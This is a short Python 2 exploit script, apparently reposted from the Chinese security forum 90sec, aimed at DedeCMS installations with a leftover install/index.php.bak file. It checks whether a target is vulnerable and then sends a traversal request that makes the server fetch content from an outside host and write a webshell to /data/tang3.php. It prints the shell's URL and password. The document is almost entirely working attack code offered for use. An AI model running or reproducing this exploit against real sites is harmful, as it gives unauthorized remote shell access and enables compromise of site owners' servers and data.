转自90sec@Joseph

#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
 
import requests
import sys
import re
def main():
    try:
        url="http://"+sys.argv[1].strip('http://')
    except IndexError:
        print '''
        poc: dede.py [url]http://www.baidu.com/[/url]
        '''
    payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
    urlpoc=url+payload
    code=requests.get(urlpoc).status_code
    if code==200:
        print u"恭喜存在此漏洞"
        print u"Ongoing attacks--->>>>>"
        exploit(url)
        pass
    else:
        print u"sorry 漏洞正在挣扎"
        pass
def exploit(url):
    urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
    htmlcontent=requests.get(urlpoc).content
    Probe=re.compile(r'存在')
    if Probe.findall(htmlcontent):
        print u'''
        ver:getshell成功
        shell:url+/data/tang3.php?a=0  密码为:c
        '''
        pass
    else:
        print u"请看远程地址是否已经不可用"
        pass
if __name__ == '__main__':
    main()